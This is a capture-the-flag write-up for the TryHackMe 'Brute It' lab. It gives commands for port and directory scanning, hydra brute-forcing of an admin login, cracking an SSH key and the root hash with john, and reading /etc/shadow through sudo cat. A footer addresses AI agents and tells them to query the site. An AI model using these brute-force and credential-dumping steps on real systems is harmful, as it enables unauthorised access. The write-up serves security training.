# Brute It ![](/files/-Mblytnn66EF2nbkqYf3) ## Task 2: Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.254.237 ``` ![](/files/-Mbm5lIELkzS_PCIxeeY) We have 2 open ports. ![](/files/-Mbm5pmevH5zd9t22oF2) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 22,80 * (**-oN nmap**): Saving it into a file called nmap ``` nmap -sV -sC -p 22,80 -oN nmap 10.10.254.237 ``` ![](/files/-Mbm6TIxnZesdKpshGZ5) We have the version of SSH running: `OpenSSH 7.6p1` ![](/files/-Mbm6dirBGMVKY2nkVY3) The version of Apache running is `2.4.29` ![](/files/-Mbm6jA0kzBFC_mCG4Wp) The Linux distribution running is `Ubuntu`. ![](/files/-Mbm6q2SzqHx5FTUvG0q) Lets visit the website ![](/files/-Mbm7-siuAmiQcCA814K) It a default apache2 webpage. Lets look for hidden directories on the web server using gobuster. ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.254.237/ ``` ![](/files/-Mbm7Bdi_ZTbmAd6L3ox) We found a directory called `/admin`. ![](/files/-Mbm7Js7FMtZGv6IgNdI) ## Task 3: Getting a Shell Lets visit the directory we found. ![](/files/-Mbm7YJEnlVAs8A22pEZ) Its a login page. As this is a admin login page, the username is most probably admin, we can also confirm this when we look at the source code of this page. ![](/files/-Mbm8-OyC-gdySu8Y0il) Lets use hydra to brute force and find the password. Before that we need the syntax of how the username and password are submitted. We can do this by using Burpsuite. Lets attempt a login and capture the request with burp. ![](/files/-Mbm9dDvWSBmeKTW-uN1) The format is `user=&pass=` , which we will supply to burp, we also see a `PHPSESSID` cookie, which we need to include in the hydra command. The other thing we need is what the website response is when there is a failed login attempt. Lets forward the request and we can see this. ![](/files/-MbmAgIpZ7Sa10BzpAkO) Now we have all the information we need, so lets run Hydra to crack the password. Hydra command breakdown: * -l admin: Specifying the username as admin * -P /usr/share/wordlists/rockyou.txt: Specifying the password list. * 10.10.254.237: Target IP * `http-post-form`: Type of attack protocol. We are using this as we are attacking a HTTP website form. * /admin/: The directory we are attacking which has the login form * `user=^USER^&pass=^PASS^`: Login response from Burpsuite, * `Username or password invalid`: Response when there is failed login. * `H=Cookie: security=low; PHPSESSID=srir42se2cdt5roedi45msdgr0`: Cookie from the response. ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.254.237 http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password invalid:H=Cookie: security=low; PHPSESSID=srir42se2cdt5roedi45msdgr0" ``` After running this we find the password `xavier`. Lets login. ![](/files/-MbmF5tq0Yom84J7DVM6) We found the first flag, and we also have a rsa private key. Lets copy it to our machine and name the file `id_rsa` and then lets find the password using `ssh2john`and then crack the password using `john`. ![](/files/-MbmFcwyFTL1rqiXOUMQ) Lets now use `ssh2john`. ```bash /usr/share/john/ssh2john.py id_rsa > id_rsa_hash ``` ![](/files/-MbmFp1Hdz2mKEHWlCC9) Now lets crack this hash using `john`. ```bash john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash ``` ![](/files/-MbmFx_GjI0eNQiZ5ENf) And we have the password, lets login through ssh. This password might be the user `John` password as it was the only other username we found. But before that we need to change the permissions of the `id_rsa` file so that we can login with right permissions. ```bash chmod 600 id_rsa ``` ![](/files/-MbmGfySNZm-PExbFZqC) Now lets login ```bash ssh -i id_rsa john@10.10.254.237 ``` ![](/files/-MbmGjzSSdZsEfqmCrpF) We are logged in. We can read the `user.txt` file. ![](/files/-MbmGt1pTXNrNhPkq3IS) We can now answer all the questions in this section. ![](/files/-MbmH48M8F9UJChbGEe8) ## Task 4: Privilege Escalation Lets run `sudo -l` to see what we can run as root. ```bash sudo -l ``` ![](/files/-MbmHHoKLsMm5e3e-Ttb) Looks like we can run `/bin/cat` as root. Looking on [GTFOBins ](https://gtfobins.github.io/gtfobins/cat/#sudo)we can see that we can set a parameter to a file and we can read that file. ![](/files/-MbmHwod0pRFDFAmSeig) The `/etc/shadow` file stores passwords of all users on the machine, so we can find the root hash and then crack it using johntheripper. Lets first set the `LFILE` parameter to `/etc/shadow` and then read it. ```bash LFILE=/etc/shadow sudo cat "$LFILE" ``` ![](/files/-MbmITdjGlC5lobsb5ER) We have the root hash, lets copy it to our machine and store it in a file called hash and then crack it using john. ![](/files/-MbmIjg6YGzDDnT1OulF) Now lets crack it and then show it. ```bash john --wordlist=/usr/share/wordlists/rockyou.txt hash ``` ![](/files/-MbmIweZqlCHtrMU6SAx) ```bash john --show hash ``` ![](/files/-MbmJ1kRA5nbfKnwCBZd) We have the password for root. Lets switch users. ```bash su root ``` ![](/files/-MbmJJkogjPwowqQwYZY) We can now read the root flag and also answer all the questions in this section ![](/files/-MbmJPYl095tioWD25lD) ![](/files/-MbmJXbOrLSzpnA7gBsw) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/brute-it.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.